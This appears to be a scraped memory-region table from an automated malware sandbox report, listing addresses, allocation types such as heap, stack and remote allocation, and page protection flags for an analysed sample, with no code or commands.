|
BA0000
|
unkown
|
page readonly
|
||
|
2784000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
867F000
|
stack
|
page read and write
|
||
|
469F000
|
stack
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
465E000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3280000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
29A0000
|
unkown
|
page read and write
|
||
|
4C7E000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
36B8000
|
unkown
|
page read and write
|
||
|
7E9E000
|
stack
|
page read and write
|
||
|
1EC11C03000
|
trusted library allocation
|
page read and write
|
||
|
7190000
|
direct allocation
|
page read and write
|
||
|
2C03000
|
remote allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
796E000
|
stack
|
page read and write
|
||
|
1FD7F000
|
stack
|
page read and write
|
||
|
9E43000
|
direct allocation
|
page execute and read and write
|
||
|
1EC100A0000
|
system
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
339D000
|
direct allocation
|
page execute and read and write
|
||
|
AD0000
|
unkown
|
page readonly
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
3790000
|
heap
|
page read and write
|
||
|
2284000
|
heap
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
4830000
|
direct allocation
|
page read and write
|
||
|
4CBE000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
5E8000
|
unkown
|
page write copy
|
||
|
1EC101F0000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
475D000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
F07000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A22000
|
heap
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
4545000
|
heap
|
page read and write
|
||
|
1EC11DCE000
|
trusted library allocation
|
page read and write
|
||
|
7180000
|
direct allocation
|
page read and write
|
||
|
B80000
|
unkown
|
page readonly
|
||
|
339E000
|
stack
|
page read and write
|
||
|
3085000
|
heap
|
page read and write
|
||
|
29C4000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1020000
|
heap
|
page read and write
|
||
|
89B0000
|
heap
|
page read and write
|
||
|
4781000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A14000
|
heap
|
page read and write
|
||
|
48A0000
|
direct allocation
|
page read and write
|
||
|
2A3B000
|
heap
|
page read and write
|
||
|
304B000
|
heap
|
page read and write
|
||
|
2A00000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
755000
|
heap
|
page read and write
|
||
|
494D000
|
stack
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
88BE000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1FD3E000
|
stack
|
page read and write
|
||
|
853F000
|
stack
|
page read and write
|
||
|
1EC11C0F000
|
trusted library allocation
|
page read and write
|
||
|
29C2000
|
heap
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
A55000
|
unkown
|
page read and write
|
||
|
31FD000
|
direct allocation
|
page execute and read and write
|
||
|
8921000
|
heap
|
page read and write
|
||
|
1FED0000
|
direct allocation
|
page read and write
|
||
|
2A28000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1590000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
764E000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
859E000
|
stack
|
page read and write
|
||
|
2016C000
|
stack
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
2A14000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
2EF0000
|
trusted library allocation
|
page read and write
|
||
|
477C000
|
heap
|
page read and write
|
||
|
7C65000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
2D7F000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
84F7000
|
stack
|
page read and write
|
||
|
1590000
|
unkown
|
page readonly
|
||
|
7C6A000
|
heap
|
page read and write
|
||
|
2F22000
|
heap
|
page read and write
|
||
|
8775000
|
trusted library allocation
|
page read and write
|
||
|
568E000
|
trusted library allocation
|
page read and write
|
||
|
54DC000
|
stack
|
page read and write
|
||
|
304A000
|
heap
|
page read and write
|
||
|
1153000
|
system
|
page execute and read and write
|
||
|
2A82000
|
heap
|
page read and write
|
||
|
1FCC0000
|
heap
|
page read and write
|
||
|
833D000
|
stack
|
page read and write
|
||
|
207A1000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1011000
|
unkown
|
page readonly
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
AD0000
|
unkown
|
page readonly
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
83A000
|
stack
|
page read and write
|
||
|
2A35000
|
heap
|
page read and write
|
||
|
2DEC000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC11AF0000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
A4E000
|
unkown
|
page readonly
|
||
|
EF0000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
6099000
|
trusted library allocation
|
page read and write
|
||
|
106F4000
|
system
|
page read and write
|
||
|
476C000
|
heap
|
page read and write
|
||
|
8B10000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
31F9000
|
direct allocation
|
page execute and read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
4781000
|
heap
|
page read and write
|
||
|
7C31000
|
heap
|
page read and write
|
||
|
407000
|
unkown
|
page readonly
|
||
|
205FD000
|
direct allocation
|
page execute and read and write
|
||
|
A0F000
|
stack
|
page read and write
|
||
|
7200000
|
heap
|
page execute and read and write
|
||
|
5688000
|
trusted library allocation
|
page read and write
|
||
|
30D0000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
561E000
|
stack
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C7F000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
2A59000
|
heap
|
page read and write
|
||
|
476C000
|
heap
|
page read and write
|
||
|
B90000
|
unkown
|
page read and write
|
||
|
1FEC0000
|
direct allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
990000
|
unkown
|
page readonly
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
330E000
|
stack
|
page read and write
|
||
|
240E000
|
stack
|
page read and write
|
||
|
115C000
|
system
|
page execute and read and write
|
||
|
2A4C000
|
heap
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
2A14000
|
heap
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
2F8F000
|
stack
|
page read and write
|
||
|
29BF000
|
heap
|
page read and write
|
||
|
626000
|
unkown
|
page write copy
|
||
|
710000
|
heap
|
page read and write
|
||
|
7A2D000
|
stack
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
4771000
|
heap
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
7EF0000
|
heap
|
page read and write
|
||
|
7220000
|
direct allocation
|
page read and write
|
||
|
2A1F000
|
heap
|
page read and write
|
||
|
2A03000
|
heap
|
page read and write
|
||
|
7C74000
|
heap
|
page read and write
|
||
|
55DF000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A22000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
79EE000
|
stack
|
page read and write
|
||
|
980000
|
unkown
|
page readonly
|
||
|
7C36000
|
heap
|
page read and write
|
||
|
2B3E000
|
stack
|
page read and write
|
||
|
7920000
|
heap
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
894F000
|
heap
|
page read and write
|
||
|
A30000
|
unkown
|
page readonly
|
||
|
3350000
|
heap
|
page execute and read and write
|
||
|
4778000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
28D0000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
5EE000
|
unkown
|
page write copy
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
327D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8530000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
51C6000
|
trusted library allocation
|
page read and write
|
||
|
F00000
|
heap
|
page read and write
|
||
|
93C000
|
stack
|
page read and write
|
||
|
4870000
|
direct allocation
|
page read and write
|
||
|
2A35000
|
heap
|
page read and write
|
||
|
2AFD000
|
stack
|
page read and write
|
||
|
27FE000
|
unkown
|
page read and write
|
||
|
476E000
|
heap
|
page read and write
|
||
|
1FEB0000
|
direct allocation
|
page read and write
|
||
|
20820000
|
unclassified section
|
page execute and read and write
|
||
|
30A2000
|
heap
|
page read and write
|
||
|
48A000
|
unkown
|
page readonly
|
||
|
29D3000
|
heap
|
page read and write
|
||
|
300E000
|
stack
|
page read and write
|
||
|
A4E000
|
unkown
|
page readonly
|
||
|
29B9000
|
heap
|
page read and write
|
||
|
1EC1021B000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
10003000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
B90000
|
unkown
|
page readonly
|
||
|
71C0000
|
direct allocation
|
page read and write
|
||
|
4860000
|
direct allocation
|
page read and write
|
||
|
55E000
|
stack
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
A40000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
60DB000
|
trusted library allocation
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
7C29000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page read and write
|
||
|
2305000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A1F000
|
heap
|
page read and write
|
||
|
30AC000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
A55000
|
unkown
|
page read and write
|
||
|
10001000
|
unkown
|
page execute read
|
||
|
2290000
|
heap
|
page read and write
|
||
|
1049000
|
unkown
|
page write copy
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
F1F000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
76AA000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7140000
|
direct allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC100C6000
|
system
|
page execute and read and write
|
||
|
30AD000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
201B0000
|
direct allocation
|
page read and write
|
||
|
4840000
|
direct allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
29C0000
|
unkown
|
page read and write
|
||
|
4BE0000
|
trusted library allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
409000
|
unkown
|
page read and write
|
||
|
B4A000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3289000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
28A0000
|
heap
|
page read and write
|
||
|
2A59000
|
heap
|
page read and write
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
1280000
|
unkown
|
page readonly
|
||
|
4B8C000
|
stack
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A0E000
|
heap
|
page read and write
|
||
|
2A0E000
|
heap
|
page read and write
|
||
|
1EC11D00000
|
trusted library allocation
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
8990000
|
heap
|
page read and write
|
||
|
A40000
|
unkown
|
page readonly
|
||
|
A75E1FE000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2690000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A20000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A77000
|
heap
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
89B8000
|
heap
|
page read and write
|
||
|
2203000
|
remote allocation
|
page execute and read and write
|
||
|
25F8000
|
stack
|
page read and write
|
||
|
2A84000
|
heap
|
page read and write
|
||
|
29C4000
|
heap
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC11C0A000
|
trusted library allocation
|
page read and write
|
||
|
2F90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3274000
|
trusted library allocation
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
33A1000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A4F000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3526000
|
unkown
|
page read and write
|
||
|
2A7D000
|
heap
|
page read and write
|
||
|
29C4000
|
heap
|
page read and write
|
||
|
A57000
|
unkown
|
page readonly
|
||
|
2A55000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3E08000
|
unclassified section
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
6BE000
|
stack
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
AC0000
|
unkown
|
page readonly
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
5EA000
|
unkown
|
page write copy
|
||
|
2E70000
|
trusted library allocation
|
page read and write
|
||
|
E92000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC100C2000
|
system
|
page execute and read and write
|
||
|
384A000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
4C3E000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
1FE7D000
|
stack
|
page read and write
|
||
|
7CF000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A28000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
AE0000
|
unkown
|
page readonly
|
||
|
5F0000
|
unkown
|
page write copy
|
||
|
426000
|
unkown
|
page read and write
|
||
|
A40000
|
unkown
|
page readonly
|
||
|
C20000
|
heap
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3603000
|
remote allocation
|
page execute and read and write
|
||
|
571F000
|
stack
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
71E000
|
heap
|
page read and write
|
||
|
46FE000
|
heap
|
page read and write
|
||
|
1011000
|
unkown
|
page readonly
|
||
|
10002000
|
unkown
|
page readonly
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
204C1000
|
heap
|
page read and write
|
||
|
2CB2000
|
heap
|
page read and write
|
||
|
990000
|
unkown
|
page readonly
|
||
|
33A7000
|
heap
|
page read and write
|
||
|
48B0000
|
direct allocation
|
page read and write
|
||
|
44A0000
|
heap
|
page read and write
|
||
|
7170000
|
direct allocation
|
page read and write
|
||
|
2A80000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
201B0000
|
direct allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
A55000
|
unkown
|
page read and write
|
||
|
896F000
|
heap
|
page read and write
|
||
|
E8E000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
76D000
|
heap
|
page read and write
|
||
|
39CE000
|
stack
|
page read and write
|
||
|
29F9000
|
heap
|
page read and write
|
||
|
1025000
|
heap
|
page read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
1EC101F7000
|
heap
|
page read and write
|
||
|
8B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A00000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A0E000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
334E000
|
unkown
|
page read and write
|
||
|
883C000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2F8F000
|
stack
|
page read and write
|
||
|
3412000
|
direct allocation
|
page execute and read and write
|
||
|
5C0000
|
unkown
|
page readonly
|
||
|
1000000
|
unkown
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
50D4000
|
trusted library allocation
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
29CA000
|
heap
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A28000
|
heap
|
page read and write
|
||
|
A10000
|
unkown
|
page read and write
|
||
|
4003000
|
remote allocation
|
page execute and read and write
|
||
|
204D0000
|
direct allocation
|
page execute and read and write
|
||
|
89C8000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
326E000
|
direct allocation
|
page execute and read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
9443000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2023E000
|
heap
|
page read and write
|
||
|
2006C000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2A55000
|
heap
|
page read and write
|
||
|
116C000
|
system
|
page execute and read and write
|
||
|
403000
|
unkown
|
page write copy
|
||
|
51E000
|
stack
|
page read and write
|
||
|
B7E000
|
stack
|
page read and write
|
||
|
44E000
|
unkown
|
page readonly
|
||
|
4782000
|
heap
|
page read and write
|
||
|
A41000
|
unkown
|
page execute read
|
||
|
409000
|
unkown
|
page write copy
|
||
|
A41000
|
unkown
|
page execute read
|
||
|
1EC11DBE000
|
trusted library allocation
|
page read and write
|
||
|
4880000
|
direct allocation
|
page read and write
|
||
|
11CF000
|
system
|
page execute and read and write
|
||
|
1FE3C000
|
stack
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
4CD000
|
stack
|
page read and write
|
||
|
85E0000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
3394000
|
unkown
|
page read and write
|
||
|
20170000
|
direct allocation
|
page read and write
|
||
|
32A0000
|
trusted library allocation
|
page read and write
|
||
|
38CF000
|
stack
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
3378000
|
trusted library allocation
|
page read and write
|
||
|
7777000
|
trusted library allocation
|
page read and write
|
||
|
1EC11C21000
|
trusted library allocation
|
page read and write
|
||
|
92A0000
|
direct allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
32FD000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
90E000
|
stack
|
page read and write
|
||
|
970000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2780000
|
heap
|
page read and write
|
||
|
2066E000
|
direct allocation
|
page execute and read and write
|
||
|
227E000
|
stack
|
page read and write
|
||
|
A10000
|
unkown
|
page read and write
|
||
|
5B0000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
DF7000
|
heap
|
page read and write
|
||
|
9EE000
|
stack
|
page read and write
|
||
|
84F000
|
stack
|
page read and write
|
||
|
44E000
|
unkown
|
page readonly
|
||
|
1EC101B0000
|
heap
|
page read and write
|
||
|
760E000
|
stack
|
page read and write
|
||
|
7C40000
|
heap
|
page read and write
|
||
|
8510000
|
heap
|
page read and write
|
||
|
452F000
|
stack
|
page read and write
|
||
|
2ACE000
|
stack
|
page read and write
|
||
|
2F4E000
|
stack
|
page read and write
|
||
|
20179000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
2A62000
|
heap
|
page read and write
|
||
|
70AE000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
5C0000
|
unkown
|
page readonly
|
||
|
7C70000
|
heap
|
page read and write
|
||
|
4782000
|
heap
|
page read and write
|
||
|
5E6000
|
unkown
|
page write copy
|
||
|
71000
|
heap
|
page read and write
|
||
|
2BE0000
|
unkown
|
page readonly
|
||
|
A40000
|
unkown
|
page readonly
|
||
|
4820000
|
direct allocation
|
page read and write
|
||
|
48D000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
201F1000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1FFAE000
|
stack
|
page read and write
|
||
|
29C4000
|
heap
|
page read and write
|
||
|
308A000
|
heap
|
page read and write
|
||
|
B90000
|
unkown
|
page read and write
|
||
|
A41000
|
unkown
|
page execute read
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1FF1E000
|
stack
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
477D000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
46E0000
|
direct allocation
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
2A62000
|
heap
|
page read and write
|
||
|
28D4000
|
heap
|
page read and write
|
||
|
3240000
|
trusted library section
|
page read and write
|
||
|
7C31000
|
heap
|
page read and write
|
||
|
A01000
|
unkown
|
page readonly
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
48D0000
|
heap
|
page read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
421000
|
unkown
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
27B0000
|
heap
|
page read and write
|
||
|
AE0000
|
unkown
|
page readonly
|
||
|
29A0000
|
unkown
|
page read and write
|
||
|
7C54000
|
heap
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
1200000
|
unkown
|
page readonly
|
||
|
46D0000
|
direct allocation
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
7450000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
42E000
|
unkown
|
page read and write
|
||
|
27FA000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
4BCE000
|
stack
|
page read and write
|
||
|
8680000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
970000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1EC10220000
|
heap
|
page read and write
|
||
|
46A0000
|
direct allocation
|
page read and write
|
||
|
2280000
|
heap
|
page read and write
|
||
|
7670000
|
heap
|
page read and write
|
||
|
71A0000
|
direct allocation
|
page read and write
|
||
|
88FC000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
44A000
|
unkown
|
page readonly
|
||
|
2E8E000
|
unkown
|
page read and write
|
||
|
2A6C000
|
stack
|
page read and write
|
||
|
7C31000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2BDF000
|
stack
|
page read and write
|
||
|
1FFEF000
|
stack
|
page read and write
|
||
|
759000
|
heap
|
page read and write
|
||
|
44EE000
|
stack
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
4850000
|
direct allocation
|
page read and write
|
||
|
20450000
|
heap
|
page read and write
|
||
|
201B0000
|
direct allocation
|
page read and write
|
||
|
8978000
|
heap
|
page read and write
|
||
|
7C31000
|
heap
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
1EC10160000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
376F000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
8B30000
|
trusted library allocation
|
page read and write
|
||
|
4778000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
76DB000
|
heap
|
page read and write
|
||
|
447000
|
unkown
|
page read and write
|
||
|
8946000
|
heap
|
page read and write
|
||
|
649000
|
unkown
|
page write copy
|
||
|
7741000
|
heap
|
page read and write
|
||
|
3018000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
77B1000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
4788000
|
heap
|
page read and write
|
||
|
29B9000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
980000
|
unkown
|
page readonly
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
1FF5F000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
44E000
|
unkown
|
page readonly
|
||
|
10000000
|
unkown
|
page readonly
|
||
|
1150000
|
system
|
page execute and read and write
|
||
|
B80000
|
unkown
|
page readonly
|
||
|
A75C9FE000
|
stack
|
page read and write
|
||
|
205F9000
|
direct allocation
|
page execute and read and write
|
||
|
2021E000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library section
|
page read and write
|
||
|
46B0000
|
direct allocation
|
page read and write
|
||
|
434000
|
unkown
|
page read and write
|
||
|
46FA000
|
heap
|
page read and write
|
||
|
93C000
|
stack
|
page read and write
|
||
|
2D71000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
4778000
|
heap
|
page read and write
|
||
|
39E0000
|
unkown
|
page execute and read and write
|
||
|
2D71000
|
heap
|
page read and write
|
There are 898 hidden memdumps, click here to show them.